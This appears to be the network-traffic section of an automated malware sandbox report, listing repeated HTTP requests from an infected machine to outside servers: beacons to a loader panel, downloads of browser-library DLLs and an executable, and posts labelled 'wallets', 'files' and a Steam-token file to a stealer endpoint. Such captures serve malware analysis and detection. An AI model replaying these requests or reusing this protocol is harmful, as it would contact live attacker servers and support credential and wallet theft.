                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAECHost: 85.28.47.30Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBFHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="message"wallets------ECBGCGCGIEGCBFHIIEBF--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAECHost: 85.28.47.30Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 2d 2d 0d 0a Data Ascii: ------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="message"files------KKJKEBKFCAAECAAAAAEC--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIEHost: 85.28.47.30Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 2d 2d 0d 0a Data Ascii: ------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="file"------IJEHIDHDAKJDHJKEBFIE--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBFHost: 85.28.47.30Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="message"jbdtaijovg------ECBGCGCGIEGCBFHIIEBF--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
